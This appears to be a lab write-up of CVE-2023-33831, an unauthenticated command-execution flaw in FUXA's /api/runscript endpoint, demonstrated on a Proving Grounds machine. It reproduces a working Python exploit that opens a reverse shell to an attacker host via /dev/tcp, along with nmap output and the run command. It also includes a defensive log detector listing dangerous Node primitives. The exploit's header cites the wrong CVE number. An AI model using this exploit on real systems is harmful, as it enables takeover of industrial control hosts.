CVE-2023-33831

This vulnerability is a remote command execution (RCE) flaw in the /api/runscript endpoint of FUXA 1.1.13 that allows attackers to execute arbitrary commands via a crafted POST request. It is caused by a lack of control or sanitization of user-controllable inputs, which lets a caller reach dangerous methods that escalate to remote code execution. The affected route is /api/runscript, where it is possible to execute commands without authenticating, through the code parameter of a POST request, using the exec function of Node's child_process module.

FUXA is web-based process visualization (SCADA/HMI/Dashboard) software. With FUXA you can create modern process visualizations with individual designs for your machines and real-time data display.

You can read more about it on GitHub.

This Python exploit on GitHub shows how effortlessly the flaw can be exploited to obtain root access on the machine. The script is reproduced below:

# Exploit Title: FUXA V.1.1.13-1186 - Unauthenticated Remote Code Execution (RCE)
# Date: 18/04/2023
# Exploit Author: Rodolfo Mariano
# Vendor Homepage: https://github.com/frangoteam/FUXA
# Version: FUXA V.1.1.13-1186
# CVE: CVE-2022-26134
# https://github.com/rodolfomarianocy/

from argparse import RawTextHelpFormatter
import argparse, requests

def main(rhost, rport, lhost, lport):
    url = "http://"+rhost+":"+rport+"/api/runscript"
    payload = {
        "headers":
            {
                "normalizedNames":{},
                "lazyUpdate": "null"
            },
            "params":{
                "script":{
                    "parameters":[
                    {
                    "name":"ok",
                    "type":"tagid",
                    "value":""
                    }
                    ],
                    "mode":"",
                    "id":"",
                    "test":"true",
                    "name":"ok",
                    "outputId":"",
                    "code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport)
                }
            }
        }
    try:
        response = requests.post(url, json=payload)
    except requests.exceptions.ConnectionError:
        print("url connection error")

parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhost <ip> --rport <rport> --lhost <lhost> --lport <lport>")
parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost', required=True)
parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default="1881")
parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost', required=True)
parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport', required=True)
args=parser.parse_args()

main(args.rhost, args.rport, args.lhost, args.lport)

The script is fairly easy to run and takes the following arguments:

  • The remote host IP address running FUXA V.1.1.13-1186
  • The port on which FUXA is running
  • The attacker machine’s IP
  • The attacker machine’s listening port
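The request shape above is what a defender should be looking for in the traffic in front of a FUXA instance. The following detector is an added example for this writeup, not FUXA's or the exploit author's code; it assumes a constructed JSON-lines log (one request per line with source, method, path, Authorization header and the parsed JSON body) of the kind a logging reverse proxy could produce, and flags unauthenticated /api/runscript calls whose script reaches Node's process primitives.

```python
import json
import re

# Node primitives that let a "script" leave the HMI and touch the host.
DANGEROUS = re.compile(
    r"require\(\s*['\"](child_process|fs|net|http|https)['\"]\s*\)"
    r"|\b(exec|execSync|spawn|spawnSync|execFile)\s*\("
    r"|process\.(env|exit|binding|mainModule)"
)

def assess_request(record):
    """Finding for a suspicious POST /api/runscript record (one parsed log line), else None."""
    if not isinstance(record, dict) or record.get("method") != "POST" \
            or record.get("path") != "/api/runscript":
        return None
    script = ((record.get("body") or {}).get("params") or {}).get("script") or {}
    reasons = []
    if not record.get("authorization"):
        reasons.append("no Authorization header on a script-execution endpoint")
    if str(script.get("test", "")).lower() == "true":
        reasons.append("test flag set, as in the public exploit payload")
    hit = DANGEROUS.search(str(script.get("code", "")))
    if hit:
        reasons.append("script reaches OS primitives: " + hit.group(0))
    return {"src": record.get("src"), "reasons": reasons} if reasons else None

def scan(log_lines):
    """Apply assess_request to JSON-lines records, skipping unparseable lines."""
    findings = []
    for line in log_lines:
        try:
            finding = assess_request(json.loads(line))
        except json.JSONDecodeError:
            continue
        if finding:
            findings.append(finding)
    return findings

# Constructed sample log (not real traffic): an authenticated benign script,
# an unauthenticated request shaped like the exploit above, and a junk line.
SAMPLE_LOG = [
    json.dumps({"src": "10.0.0.5", "method": "POST", "path": "/api/runscript",
                "authorization": "Bearer <redacted>", "body": {"params": {"script":
                {"test": "false", "code": "var x = 2 + 2; return x;"}}}}),
    json.dumps({"src": "198.51.100.7", "method": "POST", "path": "/api/runscript",
                "authorization": None, "body": {"params": {"script":
                {"test": "true", "code": "require('child_process').exec('id')"}}}}),
    "not json at all",
]

FINDINGS = scan(SAMPLE_LOG)  # -> one finding, for 198.51.100.7, with three reasons
```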

I am using a machine from OffSec’s Proving Grounds lab to demonstrate this vulnerability.

We will need to scan for open ports on the machine to discover the port on which FUXA is running.

┌──(ishsome㉿kali)-[~/…/PG Machines/Practice/Linux/CVE-2023-33831]
└─$ nmap -p22,1881 192.168.168.35 -A -oN nmap/cve-2023-33831
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-09 18:25 CDT
Nmap scan report for 192.168.168.35
Host is up (0.052s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 62:36:1a:5c:d3:e3:7b:e1:70:f8:a3:b3:1c:4c:24:38 (RSA)
|   256 ee:25:fc:23:66:05:c0:c1:ec:47:c6:bb:00:c7:4f:53 (ECDSA)
|_  256 83:5c:51:ac:32:e5:3a:21:7c:f6:c2:cd:93:68:58:d8 (ED25519)
1881/tcp open  http    Node.js Express framework
|_http-title: FUXA
|_http-cors: GET POST PUT DELETE
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds

We can see that FUXA is running on port 1881, so we now have all the information we need. Let’s run the script and obtain a shell on the machine!

┌──(ishsome㉿kali)-[~/…/Practice/Linux/CVE-2023-33831/Unauthenticated-RCE-FUXA-CVE-2023-33831]
└─$ python3 CVE-2023-33831.py --rhost 192.168.168.35 --rport 1881 --lhost 192.168.45.234 --lport 80